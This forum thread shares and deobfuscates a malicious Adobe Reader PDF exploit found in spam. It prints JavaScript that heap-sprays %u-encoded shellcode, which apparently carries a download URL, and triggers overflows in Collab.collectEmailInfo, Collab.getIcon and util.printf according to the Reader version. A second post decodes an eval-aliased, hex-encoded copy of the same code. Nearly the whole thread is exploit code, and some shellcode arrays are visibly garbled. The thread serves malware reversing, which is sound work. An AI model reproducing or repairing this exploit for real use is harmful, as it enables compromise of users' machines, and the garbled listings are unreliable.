
PDF Exploit


int0
July 31st, 2009, 05:06
Decided to share a PDF exploit that I found yesterday in my spam over ICQ; it might be interesting for those who reverse these PDF JS exploits.

Code:
// Holds the spray strings (padding + shellcode) built by gdBvrtVkT, one entry per chunk.
var l21PZz0Q = new Array();
// Timer handle returned by app.setTimeOut at the bottom of the script; cleared again in u3YLEtn9.
var haZ0Rmde;
// Grows the padding string ve9sKDVuey by repeated self-concatenation until
// length * 2 reaches yNnpk1Ya6, then cuts it to yNnpk1Ya6 / 2 characters.
// The caller computes yNnpk1Ya6 in bytes (string length * 2), so the
// division brings it back to a string length. Used by gdBvrtVkT to size
// the padding of each spray chunk.
function s8oOpYtLG(ve9sKDVuey, yNnpk1Ya6) {
while (ve9sKDVuey.length * 2 < yNnpk1Ya6) {
ve9sKDVuey += ve9sKDVuey;
}
ve9sKDVuey = ve9sKDVuey.substring(0, yNnpk1Ya6 / 2);
return ve9sKDVuey;
}
// Fills l21PZz0Q with spray set vGTSfY3ftC (0, 1 or 2). Each set pairs a
// target address (vOtVmM9Ws6) with a %u-encoded shellcode array; the array
// is decoded with unescape and appended to a padding string sized so that
// padding + shellcode fills one 0x400000-byte chunk. u3YLEtn9 picks the set
// that matches the Reader version branch it is about to trigger.
// NOTE(analysis): the arrays below are mis-encoded in the post — the forum
// apparently decoded part of the %uXXXX escapes into CJK characters (compare
// the clean '%u5350%','u5251%u','5756%u9c5' fragments quoted later in the
// thread), so this listing is not runnable as-is.
function gdBvrtVkT(vGTSfY3ftC) {
if (vGTSfY3ftC == 0) {
// Spray target address for set 0.
var vOtVmM9Ws6 = 0x0c0c0c0c;
// Shellcode variant 0, split into many short %u fragments (a common trick
// against simple "%u" signature matching).
var ruNE9AoC = new Array('%u5350%', 'u5251%u', '5756৅', '5%', 'u0000%u', '5d00໘', '3̐', 'd擀', '003x', '30‹', '0c', '0炋%', 'uad1c%u', '408b%', 'ueb08‹', '09̈́', '0䂍', 'b7c㱀', '坖', 'ebe%', 'u0100௾', 'eŎ%u', '0000%', 'uef01
', '6e8%u', '0001%', 'u5f00࢕', 'e自', '廂', '01R', '00', '068', '00࿰', '0井%u', '0001‰', '00自', '׬', '2%u', '3100%u', '01f6', 'ac2͙', 'cɣ', '%', 'ufb80%u', '7400%', 'u8806', '21cິ', '6౮', 'e㈄%u', '8900%u', '81ea%', 'u45c2', '002Ԡ', '0闿%u', '0152', '00%u', 'c281%u', '0250', '00ԅ', '2闿', '156', '0j', '06a', 'a89슁%', 'u015e', '', '襒', '自x', 'c2', '刀', '6a', 'ff', '6a%u', 'c281%', 'u015e%', 'u0000', 'f52֩', '5', '褀', '自%', 'u5ec2%u', '0001刀', '聨', '%u', 'ff00%', 'u4e95%', 'u0001࢐', '0自', '廂%', 'u0001%u', '3100', '6諂%u', '359c%', 'u026e', '%', 'ufb80݀', '0蠆%', 'u321c%', 'ueb46౮', 'e㈄%', 'u8900', '自%u', '45c2%', 'u0002%u', '5200闿', 'Œ', '', '0', '89', '281ɐ', '', '052%u', '95ffŖ', '', '0', 'a', '6a', 'న', '1', 'e', '襒%', 'u81ea
', '6c2%u', '0002刀', 'j%', 'ud0ff%u', '056a%u', 'ea89%', 'uc281', 'Ş%u', '0000%u', 'ff52֩', '5', '鴀%u', '5f5d֥', 'e[', '59썘%u', '0000', '00%', 'u0000', '%', 'u0000%', 'u0000', '', '0ٔ', '7呴%', 'u6d65', '偰', '461䅨', '䰀', '慯%', 'u4c64b', '69a', '72y', '72', '041ٔ', '7側%u', '6f72%u', '4163%', 'u6464e', '72ܷ', '3հ', '0湩%', 'u7845%', 'u6365', '00%u', 'f789%u', 'c030%', 'u75ae)', 'fd࢟', '7̟', '9뻀', '<%u', '0000%u', 'b503', '21b', '00굦', '蔃%u', '021b', '0炋', '378᳆%', 'ub503', '1b', '00௘', 'd', '1f', '00', '3adƸ', '5%u', 'ab00', '3adᮅ', '', '000궫', '蔃%', 'u021b', '00', 'eab�', '嚭', '503!', 'b', '욉%', 'ud789', 'c51੯', '3t', '59帄', '%u', '5ee9', '93', '3e0➅', '', '100–', 'f6૖', '6', '302ᾅ', '', '褀%', 'uadc6…', '03ț', '', 'c3%u', '0000', '0', '000', '00', '00%', 'u8900Ƹ', '5', '600', '857x', '?^', '5fƫ%u', '80ce%u', 'bb3eɴ', '', '嗃L', '52', 'f4d.', '4eӄ', '4L%', 'u5255%', 'u444cw', '6fۆ', 'e慯', '464F', '6f汩%u', '4165%', 'u7500ه', '0瑡', 'e65', '865', '65牣', '獡%u', '2e68h', '70p%u', '7468灴', '˳', 'a愯%u', '6f64ٖ', '2甭%u', '6470݆', '1湩%', 'u2d67%u', '6573%', 'u7672%u', '6369', 'e65%u', '6e63%', 'u6e2f', 'c75', 'f6cp', '75ؖ', '4整%u', '702e܆', '8椿', '㵤', '0%u', '9000');
} else if (vGTSfY3ftC == 1) {
// Spray target address for set 1 (same hoisted var as above, no "var").
vOtVmM9Ws6 = 0x30303030;
// Shellcode variant 1.
var ruNE9AoC = new Array('卐', '251յ', '6鱕%u', '00e8', '00א', '0໘', '3ㄍ%u', '64c0', '003%u', '7830%u', '8b0c%u', '0c40p', '8b괜%u', '408b', '08謉%', 'u3440%', 'u408d%', 'u8b7c', '㱀W', '56庾%', 'u0001%u', '0100%', 'ubfee%u', '014e', '', 'e8', '01开', '襞%u', '81ea廂', '%u', '5200%u', '8068%u', '0000＀', 'ө', '5', '900自', '廂', '01㄀%', 'u01f6%', 'u8ac2', '㖜', '263', '00ﮀ%', 'u7400%u', '8806', '21c', 'b46%u', 'c6ee㈄', '褀%u', '81ea%', 'u45c2', '02刀%u', '95ff%', 'u0152', '%u', 'ea89', '81ɐ%', 'u0000P', '52闿%', 'u0156%', 'u0000', '06aj', '', '슁', '5e', '00࢕', '2自', '磂', '02刀%u', '006a%', 'ud0ff', 'ժ%u', 'ea89슁', 'Ş%', 'u0000', 'f52媕%', 'u0001%u', '8900ࠞ', 'a廂%u', '0001%u', '5200%u', '8068', '＀N', '95%u', '8900%u', '81ea׬', '2', '01㄀%u', '01f6%', 'u8ac2%', 'u359c%', 'u026e', '00ﮀ%', 'u7400ˆ', '06㈜', '', '౮', 'e㈄%', 'u8900%u', '81ea䗂', '', '2Ԡ', '0闿', 'Œ', '00', '89న', '1ɐ', '000P', '52闿%', 'u0156%', 'u0000', 'aj%', 'uea89%', 'uc281', '15e', '0襒', '1ea੬', '2', '刀', '6a', 'ffժ', '', '281', '15e%u', '0000', 'f52֩', '5', '鴀%u', '5f5d', 'a5e孙', '썘', '000%', 'u0000', '00', '0', '000%u', '0000%', 'u6547%', 'u5474', 'd65偰', '瑡%', 'u4168', 'c00', '16f䱤%', 'u6269', '172%u', '7972', '41敇%', 'u5074%u', '6f72䅣', '摤', '敲%', 'u7373', '700湩%', 'u7845', '365', '00', '89', '89쀰', '疮%u', '29fd觷', 'ㇹ', 'ec0', '3c', '딃', '21b', '000굦%', 'u8503%', 'u021b%', 'u0000܈', 'b荸%', 'u1cc6', '딃%u', '021b', '0', '8dȟ%u', '0000', '3adƸ', '5', '02ર', '0έ%', 'u1b85%u', '0002倀', '궫%', 'u8503!', 'b', '00ת', 'b�%', 'u56ad', '503ț%', 'u0000', '욉
', '789ﱑ%', 'ua6f3', '459^', '04', '43', 'ee9%u', 'd193%u', '03e0%u', '2785', '2㄀%', 'u96f6૖', '6', 'c1', '302ᾅ', '%', 'u8900૜', '6蔃', 'ț', '000', '', '0', '00', '', '0', '', '000%u', '0000', '900Ƹ', '5', '2嘀', '', '58?', '幟', 'ƫ', '胎', '3eɴ%', 'uedebU', 'c3䱒%u', '4f4d%', 'u2e4e', '䱄', '04c剕%', 'u444cw', '6f', 'c6e慯%', 'u5464F', '6f汩%u', '4165ݐ', '0摰', '461⹥%', 'u7865', '5牣', 'ܶ', '1⹨%u', '6870', '070', '468灴', '˳', 'a愯', 'f64ٖ', '2ݒ', 'd摰%u', '7461%u', '6e69', 'd67敳%', 'u7672ض', '9⹥%u', '6e63%', 'u6e2fۇ', '5⽬', '܇', '5慤', '574瀮%', 'u7068%', 'u693fϖ', '41 ', '000');
} else if (vGTSfY3ftC == 2) {
// NOTE(analysis): no assignment to vOtVmM9Ws6 is visible in this branch as
// posted; if that is faithful, n3zhysk5Q below is NaN for set 2 and the
// spray loop does not run. Whether it is an extraction artifact can't be
// told from the post.
// Shellcode variant 2.
var ruNE9AoC = new Array('卐%u', '5251坖', '鱕%', 'u00e8', '0]', '00໘', '3ㄍ%u', '64c0', '003砰%', 'u8b0c%', 'u0c40܈', 'b૑', 'c䂋%u', 'eb08ࢰ', '9̈́', '0䂍%', 'u8b7c', '㱀W', '56庾%u', '0001Ā', '뿮%', 'u014e', '0', '훨%', 'u0001װ', '0襞%', 'u81ea%u', '5ec2', '01刀', '聨%', 'u0000', '00井%', 'u0001%', 'u8900%', 'u81ea', '׬', '2', '100', '1f6諂%', 'u359c', 'ɣ', '000', '80݀', '0ˆ', '06̡', 'c', '46웮%u', '3204', '900', '1ea䗂%', 'u0002', '200•', 'ffŒ%', 'u0000%u', 'ea89', '81', '50', '00偒', '闿', '56%', 'u006a', '06a', '89', '81Ş', '', '952自%', 'u78c2%u', '0002Ԡ', '0j%u', 'd0ff', '6a', 'a89%u', 'c281', '5e%u', 'ff52媕', '%', 'u8900ࠞ', 'a廂%', 'u0001', '200ࠆ', '8', '0࿰', '0井', '001', '900自%', 'u5ec2%u', '00011', '00Ƕ', '諂%u', '359c&', 'e', '0', '80琀', '蠆', '21c', '웮2', '04‰', '00', '1ea䗂', '', '200•', 'ff', '152%', 'uea89', '281', '250%', 'u5052%', 'u95ff', '6', 'j%u', '006a', 'న', '1', '5e', '000', '952', 'ea
', '6c2', '刀%', 'u006a%', 'ud0ff', '56a', '89슁', 'Ş', '00࿵', '2֩', '5', '01鴀%', 'u5f5d', 'a5e[', '59', '358', '000%', 'u0000', '', '000', '00%', 'u0000%', 'u6547%u', '5474浥', '偰%u', '7461䅨', '䰀', '慯L', '64扩%', 'u6172%', 'u7972%u', '0041%', 'u6547', '側%', 'u6f72', '䅣', '摤%u', '6572', '373հ', '0n', '69', '845c', '65', '00%', 'uf789', '30u', 'ae', '9fd觷%', 'u31f9%u', 'bec0', '3c', '0딃%', 'u021b', '*', '66ࡐ', '3!', 'b%u', '708bƒ', '78nj', '6୐', '3ț', '', 'd8d', '1f%u', '03adᮅ', '%', 'uab00', 'adᮅ', '%', 'u5000*', 'ab蔃', 'ț%u', '0000^', 'ab�%', 'u56ad%u', '8503%u', '021b', '0욉%', 'ud789', '࿅', '1꛳%u', '7459%u', '5e04%', 'ueb43', '廩%', 'ud193>', '0➅', '', '2㄀%u', '96f6૖', '6', '̂', '85%u', '8900*', 'c6…', '03', '1b', '', '10', '00', '00', '000', '00', '%u', '0000%', 'u8900', 'b85', '02', '600', '࿵', '8?', 'e5f', 'b胎', 'b3e', '74', '՜', '3䱒%', 'u4f4d%', 'u2e4e', 'ӄ', '4L%', 'u5255%', 'u444c%u', '776f汮', '慯', '呤F', '6f', 'c69䅥%', 'u7500%', 'u6470t', '61⹥%', 'u7865%u', '0065ܦ', '3獡%', 'u2e68%', 'u6870', '70݆', '8灴%u', '2f3a%u', '612f%u', '6f64e', '62', '52dه', '0瑡', '湩-', '67敳%u', '7672ض', '9⹥', '湣%u', '6e2f%', 'u6c75˶', 'c灵%', 'u6164%u', '6574%', 'u702e', '灨', '椿%u', '3d64', '32退');
}
// Join the fragments and decode the %u escapes into the raw shellcode string.
// (The closing parenthesis of unescape(...) is missing as posted.)
ruNE9AoC = unescape(ruNE9AoC.join("");
// Chunk size: 0x400000 bytes (4 MiB) per spray string.
var eAgmifDht = 0x400000;
// Shellcode size in bytes (two bytes per string character).
var dHnF7FRmG = ruNE9AoC.length * 2;
// Padding size in bytes so that padding + shellcode fills one chunk; the
// extra 0x38 is presumably per-string overhead — not explained in the post.
var yNnpk1Ya6 = eAgmifDht - (dHnF7FRmG + 0x38);
// Padding seed; mis-encoded in the post, closing parenthesis missing too.
var ve9sKDVuey = unescape("邐邐";
ve9sKDVuey = s8oOpYtLG(ve9sKDVuey, yNnpk1Ya6);
// Number of chunks needed to reach the target address starting at 0x400000.
var n3zhysk5Q = (vOtVmM9Ws6 - 0x400000) / eAgmifDht;
// Every chunk is the same padding followed by the shellcode.
for (var l3OI3a6WPr = 0; l3OI3a6WPr < n3zhysk5Q; l3OI3a6WPr++) {
l21PZz0Q[l3OI3a6WPr] = ve9sKDVuey + ruNE9AoC;
}
}
// Timer callback registered at the bottom of the script via app.setTimeOut.
// Reads the Reader version, cancels its own timer and then, depending on the
// version range, calls one of three Collab/util APIs with oversized arguments.
// Each branch first calls gdBvrtVkT(n) so that spray set n is in memory.
function u3YLEtn9() {
var dNCo7puf = 0;
// Version string such as "8.102"; the comparisons below coerce it to a number.
var pzZx1DcVW = app.viewerVersion.toString();
app.clearTimeOut(haZ0Rmde);
// Branch 1 (8 <= v < 8.102, or v < 7.1): Collab.collectEmailInfo with a msg
// grown to at least 44952 characters by repeated self-concatenation.
if ((pzZx1DcVW >= 8 && pzZx1DcVW < 8.102) || pzZx1DcVW < 7.1) {
gdBvrtVkT(0);
// Argument mis-encoded in the post (originally a %u escape, presumably) and
// the closing parenthesis of unescape(...) is missing as posted.
var dVRPCBXpLP = unescape("ఌఌ";
while (dVRPCBXpLP.length < 44952) dVRPCBXpLP += dVRPCBXpLP;
// Method lookup through string keys ("collectEmailInfo") and aliasing of
// `this`/Collab: an obfuscation idiom; detection logic should resolve such
// bracket accesses rather than match on dotted names only.
var nB9GCOSZ = this;
var hOtfng08 = Collab;
nB9GCOSZ["collabStore"] = hOtfng08["collectEmailInfo"]({
subj: "",
msg: dVRPCBXpLP
});
}
// Branch 2 (8.102 <= v < 8.104, 9 <= v < 9.1, or v <= 7.101): Collab.getIcon
// with "N." followed by at least 0x4000 tab characters ("%09").
if ((pzZx1DcVW >= 8.102 && pzZx1DcVW < 8.104) || (pzZx1DcVW >= 9 && pzZx1DcVW < 9.1) || pzZx1DcVW <= 7.101) {
try {
if (app.doc.Collab.getIcon) {
gdBvrtVkT(2);
// Closing parenthesis missing as posted.
var eYHmb5j5U = unescape("%09";
while (eYHmb5j5U.length < 0x4000) {
eYHmb5j5U += eYHmb5j5U;
}
eYHmb5j5U = "N." + eYHmb5j5U;
var bqVh0ejwx = app;
bqVh0ejwx["doc"]["Collab"]["getIcon"](eYHmb5j5U);
dNCo7puf = 1;
} else {
dNCo7puf = 1;
}
} catch(e) {
// Every path through the try/catch sets the flag, so the util.printf stage
// below always runs once this branch is entered and its version test holds.
dNCo7puf = 1;
}
if (dNCo7puf == 1) {
// Branch 3 (exactly 8.102 or 7.1): util.printf with a "%45000f" format and a
// long numeric string (the "1299..." seed plus 276 appended '8' digits).
if (pzZx1DcVW == 8.102 || pzZx1DcVW == 7.1) {
gdBvrtVkT(1);
var qc1ncdvp = "12999999999999999999";
// vPTruT1d is never declared with var, so it becomes an implicit global.
for (vPTruT1d = 0; vPTruT1d < 276; vPTruT1d++) {
qc1ncdvp += "8";
}
var m4t4q0zGO = util;
m4t4q0zGO["printf"]("%45000f", qc1ncdvp);
}
}
}
}
// Attach the callback to the app object under a random-looking name and fire
// it 10 ms later through a string argument to app.setTimeOut, so the function
// is never called by name directly — presumably to hinder simple signature
// matching on the call site.
app.m2B1rLly = u3YLEtn9;
haZ0Rmde = app.setTimeOut("app.m2B1rLly()", 10);



These are the Adobe Reader version checks:


Code:

var pzZx1DcVW = app.viewerVersion.toString();
...
if ((pzZx1DcVW >= 8.102 && pzZx1DcVW < 8.104) || (pzZx1DcVW >= 9 && pzZx1DcVW < 9.1) || pzZx1DcVW <= 7.101)

if ((pzZx1DcVW >= 8 && pzZx1DcVW < 8.102) || pzZx1DcVW < 7.1)

if (pzZx1DcVW == 8.102 || pzZx1DcVW == 7.1)


var ruNE9AoC is an array which holds the shellcode, including the URL.

The password for the attachment is "infected".

h4h4h4h4
August 6th, 2009, 13:21
Quote:
[Originally Posted by int0;82170]Decided to share some pdf exploit that I found yesterday in my spam over ICQ it might be interesting for those who reversing these PDF JS exploits.
...

var ruNE9AoC its an array which holds shellcode with url.


First off, thanks for sharing! I'm new here, but I've been 'trolling' around for a while.

So I checked out the PDF and noticed no obfuscated JS inside of it. Next, the FlateDecode streams: I used the inflater.exe tool from Didier Stevens and decoded all the streams. I got this:

Code:


var arr = new Array('%76%61%','72%20%','6c%32%3','1%50%','5a%7a%','30%51%20%3','d%20%6','e%65%77%','20%41%72','%72 %61%','79%28%29','%3b%76%61%','72%20%68%6','1%5a%3','0%52%6d%','64%65%','3b%66','%75%6e%63','%74%69' ,'%6f%6e%2','0%73%38%6f','%4f%70%5','9%74%4c%47','%28%76%6','5%39%73','%4b%44%56%','75%65%','79%2c', '%20%79','%4e%6e%7','0%6b%31%59','%61%36%','29%7b%7','7%68%69%6','c%65%28','%76%65%39','%73%4b%4','4 %56%7','5%65%79','%2e%6c%','65%6e%67%7','4%68%2','0%2a%20','%32%20%3','c%20%79%4','e%6e%7','0%6b%',' 31%59%61','%36%29%','7b%76%65%','39%73','%4b%44','%56%75%','65%79%','20%2b%3d%','20%76%6','5%39%73%4 b','%44%5','6%75%65%79','%3b%7d%7','6%65%39','%73%4','b%44%','56%75%65%','79%20%3d%2','0%76%6','5%39 %73%4b','%44%56%','75%65%','79%2e%7','3%75%62%73','%74%72','%69%6e%','67%28%30%2','c%20%79%4','e%6e% 7','0%6b%','31%59','%61%36%20%','2f%20%32%','29%3b','%72%65%7','4%75%7','2%6e%20%76','%65%39','%73%4 b%44%','56%75%65%7','9%3b%','7d%66%75','%6e%63','%74%69%6f%','6e%20%','67%64%42%','76%72%7','4%56%6b %','54%28%76%','47%54%53%','66%59%33','%66%74%43','%29%7b%69%','66%28%7','6%47%54%','53%66%59%','33% 66%74%','43%20%3','d%3d%20','%30%29%7','b%76%61%','72%20%76','%4f%74%56%','6d%4d%','39%57%73%','36%2 0','%3d%20%','30%78%30%','63%30%','63%30%6','3%30%63','%3b%76%6','1%72%20%','72%75%4e%','45%39%','41 %6f%4','3%20%3d%','20%6e%65','%77%20%41','%72%72%6','1%79%28%2','7%25%','75%35%33%3','5%30%','25%27% ','2c%27%75%','35%32%35','%31%2','5%75%2','7%2c%27%3','5%37%35%36','%25%75%3','9%63%35%27','%2c%27%3 ','5%25%75%','30%30%65%3','8%25%27%2','c%27%75%','30%30','%30%30%25','%75%27%2','c%27%','35%64%30%', '30%25%75','%65%64%38%','27%2c%','27%33','%25%7','5%33%31%30','%27%2c%27','%64%25%75','%36%34%63%',' 30%25%75%','34%27%2c%','27%30%30%3','3%25%75%3','7%38%27','%2c%27%3','3%30%25','%75%38%62','%27%2c%2 ','7%30%63','%25%75','%30%6','3%34%2','7%2c%','27%30%','25%75%37%3','0%38%62%','25%27%2','c%27%75%', 
'61%64','%31%63%25','%75%2','7%2c%','27%34%30%3','8%62%2','5%27%2','c%27%75%65','%62%30','%38%25%75% ','38%62%2','7%2c%27%3','0%39%25%','75%33%3','4%34%27%2','c%27%30%25','%75%34%30','%38%64%2','5%75%3 8%2','7%2c%','27%62%37%','63%25%75%3','3%63%34%','30%27%2','c%27%25%75','%35%37','%35%36%25','%75%35 %2','7%2c%2','7%65%6','2%65%25%','75%30%30%3','0%31%25%2','7%2c%27%75','%30%31%','30%30%','25%75%62' ,'%66%65%','27%2c%2','7%65%25%','75%30%31%','34%65','%25%75','%27%2c%2','7%30%30%3','0%30%','25%27', '%2c%27%75','%65%6','6%30%31%','25%75%','64%27%2c','%27%36','%65%38%25%','75%27','%2c%27%','30%30',' %30%31','%25%27%2c%','27%75%35%6','6%30%30%25','%75%38%39%','35%27','%2c%27','%65%25%75','%38%31%65' ,'%61%2','7%2c%2','7%25%75%3','5%65%63','%32%2','5%75%','30%30%27%','2c%27%30%3','1%25%75%','35%32%2 ','7%2c%','27%30%30','%25%75%38','%27%2c%','27%30%36%','38%25%7','5%30%3','0%27%','2c%27','%30%30%25 %','75%66%66%3','0%27%2c','%27%30%2','5%75%','34%65%3','9%35%','25%75','%27%2c','%27%3','0%30%30','% 31%2','5%75%38%','39%27%','2c%27','%30%3','0%25%75','%38%31','%65%61%','27%2c%27%2','5%75%35%6','5%6 3%27','%2c%27%32%','25%75%30%3','0%30%31%25','%75%27%2c%','27%33','%31%30%30%','25%75%','27%2c%2','7 %30%31','%66%3','6%25%75%3','8%27%','2c%27%','61%63%32','%25%75%33','%35%39%','27%2c','%27%63%2','5% 75%30%','32%36%3','3%27%2c','%27%25%75%','30%30%','30%30%25%','27%2c%27%7','5%66%','62%38%','30%25%7 5','%27%2c%2','7%37%34%','30%30%2','5%27%2c','%27%75%','38%38','%30%36','%25%75%','33%27%2c','%27%32 %','31%63%25%','75%65','%62%34%2','7%2c%27%3','6%25%75%','63%36%65','%27%2c%27%','65%25%75%3','3%32% 30','%34%25%7','5%27%','2c%27%3','8%39%30%3','0%25%','75%27%2','c%27%','38%31%65%','61%25%27','%2c%2 7%7','5%34%3','5%63%32%25','%75%30%','27%2c%27%','30%30%32','%25%75%35%','32%30%27%2','c%27%30%2','5 %75%39%3','5%66%66','%25%75','%27%2c%27%','30%31%','35%32%','25%75%','30%30%27%','2c%27%30','%30%2', 
'5%75%65%','61%38%3','9%25%75%','27%2c%27%','63%32%','38%31%25%','75%27%2c%','27%30%32%3','5%30%','2 5%75','%30%30%27','%2c%27','%30%30%25','%75%3','5%30%35%2','7%2c%27','%32%25%','75%39%35%','66%66',' %25%75','%30%27%2c','%27%3','1%35%36%','25%75%3','0%30%30%','27%2c','%27%30%','25%75%30','%30%36%6', '1%25%75%','30%27%2c%2','7%30%36%','61%25%75%6','5%27%2c%27','%61%38%39','%25%7','5%63%3','2%38%31', '%25%27%','2c%27%75%','30%31%35','%65%27%2c','%27%25%7','5%30%30%','30%30%2','7%2c%27','%25%75%38',' %39%35%32','%27%2','c%27%25%','75%38%31%','65%61%25','%75%37%38%','27%2c','%27%63%32%','25%75%','30% 30','%30%32','%27%2','c%27%25%75','%35%32%','30%30%2','5%75%30%','30%27%2c%2','7%36%61%2','5%75%','6 4%30%','27%2c%2','7%66%66%','25%75','%30%35%','27%2c%27','%36%61%','25%75%','65%61%38%3','9%25%75%2' ,'7%2c%27','%63%32%38','%31%2','5%27%','2c%27%75%3','0%31%35','%65%25%27%','2c%27%75%','30%30%3','0% 30%','25%75%66','%27%2','c%27%','66%35','%32%2','5%75%','35%61%39','%27%2','c%27%35%','25%75%','30%3 0%30%','31%27%2','c%27%','25%75%3','8%39%30','%30%27%','2c%27%25%','75%38%','31%65%61','%25%27%2c',' %27%75%3','5%65%63%3','2%25%75%2','7%2c%27%30','%30%30%31%','25%75%','35%32%','30%30','%27%2c%','27% 25%75%','38%30%3','6%38%','27%2c%27%','25%75%30','%30%30%3','0%25%','75%27%2','c%27%66%66','%30%3',' 0%25%27%2','c%27%75%34','%65%39','%35%25','%27%2c%','27%75%','30%30%3','0%31%25%','75%38%39%','30%27 %2','c%27%30%25','%75%3','8%31%','65%61%27','%2c%27%25','%75%35%','65%63%32%2','5%27%2c%27','%75%30' ,'%30%30%31%','25%75%27','%2c%27%','33%31%30','%30%25%75','%30%31%66','%27%2','c%27%','36%25%','75%3 8%61%','63%32','%25%75%27%','2c%27','%33%35','%39%63%25','%27%2c','%27%7','5%30%32','%36%65%27','%2c %27','%25%7','5%30%30%30','%30%25%2','7%2c%27','%75%6','6%62%','38%30','%25%75%3','7%34%30%','27%2c% 27%','30%25%7','5%38%3','8%30%36%25','%27%2c%27%','75%33%32','%31%63%','25%27%2','c%27%75','%65%62%3 
4%','36%25%75','%63%36%','65%27%','2c%27%','65%25%75','%33%32','%30%34%2','5%27%2c%27','%75%3','8%39 %3','0%30%','27%2c%27%','25%75%38%3','1%65%61%25','%75%27%2c%','27%34','%35%63%3','2%25%2','7%2c%2', '7%75%30%30','%30%32','%25%7','5%27%2c%','27%35%','32%30%30%2','5%75%3','9%35%','66%66%','27%2c','%2 7%25%7','5%30%31%3','5%32%','27%2c%27%','25%75%30%3','0%30%27%2','c%27%30%2','5%75%6','5%61%27%2c',' %27%38%39','%25%75%','63%27%2c%','27%32%38%3','1%25%75%30','%32%3','5%30%27%','2c%27%','25%75%30%3', '0%30%','30%25%75%3','5%27%','2c%27','%30%3','5%32%25%7','5%27%2c%27','%39%3','5%66%66%','25%75%30', '%31%3','5%36%2','7%2c%2','7%25%75%','30%30%30%2','7%2c%2','7%30%25%7','5%30%30%36','%27%2c%27','%61 %2','5%75%30%','30%27%2c%','27%36','%61%25%75','%65%61%','38%39%2','7%2c%27%25','%75%63%','32%38%27% ','2c%27','%31%25%75','%30%31%35','%27%2c','%27%65%25%','75%30','%30%30%30%','27%2c%27','%25%7','5%3 8%3','9%35%32%','25%27','%2c%27','%75%38','%31%65','%61%25%75','%61%27%2c%','27%36%63%','32%25%7','5 %27%2c%','27%30%30%3','0%32%25%75','%35%32%','30%30%27%2','c%27%','25%75%3','0%30%36%6','1%25%27%',' 2c%27%75%6','4%30%6','6%66%25%75','%27%2c%27%','30%35%3','6%61%25%75','%27%2c%','27%65%61%3','8%39%2 5%27','%2c%27%7','5%63%32%','38%31%2','7%2c%27','%25%75%30','%31%3','5%65%','25%75%27','%2c%27%30',' %30%3','0%30%25','%75%27','%2c%27%66%','66%35%32','%25%75%35%','61%39%27%','2c%27%35','%25%75%','30% 30%3','0%31%2','7%2c%2','7%25%75%','39%64%','30%30%','25%75%27%2','c%27%','35%66%3','5%64%25%','75%3 5%','61%35%27%2','c%27%65%25','%75%35%62','%27%2c','%27%3','5%39%25%7','5%63%33%','35%38%25%','75%27 %','2c%27%3','0%30%30%30','%25%75%3','0%30%27%2c','%27%30%3','0%25%75','%30%30%3','0%30%25%','27%2c% 27','%75%30%3','0%30%30%','27%2c%2','7%25%75','%30%30%','30%30%2','5%27%2','c%27%75','%30%30%','30%3 0%25%2','7%2c%27','%75%30','%30%30%3','0%27%2c%27','%25%75%','30%30%','30%27%2','c%27%30','%25%75%', 
'36%35%3','4%27%2c%2','7%37%','25%75%3','5%34%','37%34','%25%27%2c%','27%75%36','%64%3','6%35%27','% 2c%27%2','5%75%35','%30%37%30','%25%75','%37%27%2c%','27%34%','36%31%25%','75%34%3','1%36%38%27','%2 c%27%25%','75%34%63%','30%30%27','%2c%27%','25%75%3','6%31%36','%66%25%2','7%2c%','27%75%34','%63%3' ,'6%34%25%75','%36%3','2%27%2c%2','7%36%39%','25%75%36','%31%27%2c%','27%37%3','2%25%7','5%37%','39% 27%2c','%27%3','7%32%','25%75%','30%27%2c%','27%30','%34%3','1%25%75%3','6%35%34%2','7%2c%27%37','%2 5%75%3','5%30%3','7%34%25%75','%27%2c','%27%36
// eval is aliased under another name so the call below does not match a
// naive search for "eval(" — a common obfuscation idiom worth flagging.
var alert = eval;
// `string` is not defined anywhere in the excerpt as posted (the array above
// is named `arr`), so the decoded payload presumably has to be joined and
// unescaped into `string` first; the discussion that follows notes the same.
alert(string);



Cool, some obfuscated JS. The first thing I noticed, though, is that at the end of the new Array it doesn't have a closing tick ' and bracket ). So I added those and tried to run it in Malzilla, but the eval is for 'string', not 'arr'. So I manually deobfuscated it by replacing the ',' and then I got a clean section of hex URL encoding. I converted all the %hex and got this:


Code:
// Holds the spray strings (padding + shellcode) built by gdBvrtVkT, one entry per chunk.
var l21PZz0Q = new Array();

// Timer handle returned by app.setTimeOut; cleared again in the timer callback.
var haZ0Rmde;

// Grows the padding string ve9sKDVuey by repeated self-concatenation until
// length * 2 reaches yNnpk1Ya6, then cuts it to yNnpk1Ya6 / 2 characters.
// The caller computes yNnpk1Ya6 in bytes (string length * 2), so the
// division brings it back to a string length. Used by gdBvrtVkT to size
// the padding of each spray chunk.
function s8oOpYtLG(ve9sKDVuey, yNnpk1Ya6)
{
while(ve9sKDVuey.length * 2 < yNnpk1Ya6)
{
ve9sKDVuey += ve9sKDVuey;
}
ve9sKDVuey = ve9sKDVuey.substring(0, yNnpk1Ya6 / 2);
return ve9sKDVuey;
}
function gdBvrtVkT(vGTSfY3ftC)
{
if(vGTSfY3ftC == 0)
{
var vOtVmM9Ws6 = 0x0c0c0c0c;

var ruNE9AoC = new Array('%u5350%','u5251%u','5756%u9c5','5%u00e8%','u0000%u','5d00%ued8','3%u310','d%u64c0%u4','003%u7 8','30%u8b','0c%u0c4','0%u708b%','uad1c%u','408b%','ueb08%u8b','09%u344','0%u408d%u8','b7c%u3c40','% u5756%u5','ebe%u0001%','u0100%ubfe','e%u014e%u','0000%','uef01%ud','6e8%u','0001%','u5f00%u895','e%u 81ea','%u5ec2%u00','01%u52','00%u8','068%u00','00%uff0','0%u4e95%u','0001%u89','00%u81ea','%u5ec','2 %u0001%u','3100%u','01f6%u8','ac2%u359','c%u0263','%u0000%','ufb80%u','7400%','u8806%u3','21c%ueb4', '6%uc6e','e%u3204%u','8900%u','81ea%','u45c2%u0','002%u520','0%u95ff%u','0152%u00','00%uea89%u','c28 1%u','0250%u00','00%u505','2%u95ff%u0','156%u000','0%u006a%u0','06a%ue','a89%uc281%','u015e','%u0000 ','%u8952','%u81ea%u78','c2%u0002','%u5200%u00','6a%ud0','ff%u05','6a%uea89%u','c281%','u015e%','u00 00%uf','f52%u5a9','5%u0001','%u8900','%u81ea%','u5ec2%u','0001%u5200','%u8068','%u0000%u','ff00%','u 4e95%','u0001%u890','0%u81ea','%u5ec2%','u0001%u','3100%u01f','6%u8ac2%u','359c%','u026e','%u0000%', 'ufb80%u740','0%u8806%','u321c%','ueb46%uc6e','e%u3204%','u8900','%u81ea%u','45c2%','u0002%u','5200% 